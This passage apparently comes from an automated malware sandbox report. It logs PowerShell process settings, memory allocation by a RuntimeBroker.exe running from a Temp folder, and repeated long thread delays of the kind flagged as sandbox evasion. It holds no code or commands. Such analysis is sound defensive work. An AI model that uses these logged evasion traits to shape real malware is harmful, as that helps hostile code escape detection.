            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: 1AAD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5264Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4592Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6049Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3615Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1835Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7730Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6893Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2787Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7765Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1934Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3311Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4919Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4228
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2648
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 5264 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 4592 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep count: 6049 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep count: 3615 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 1835 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 7730 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716Thread sleep count: 6893 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep count: 2787 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep count: 7765 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep count: 1934 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4440Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep count: 3311 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 4919 > 30Jump to behavior
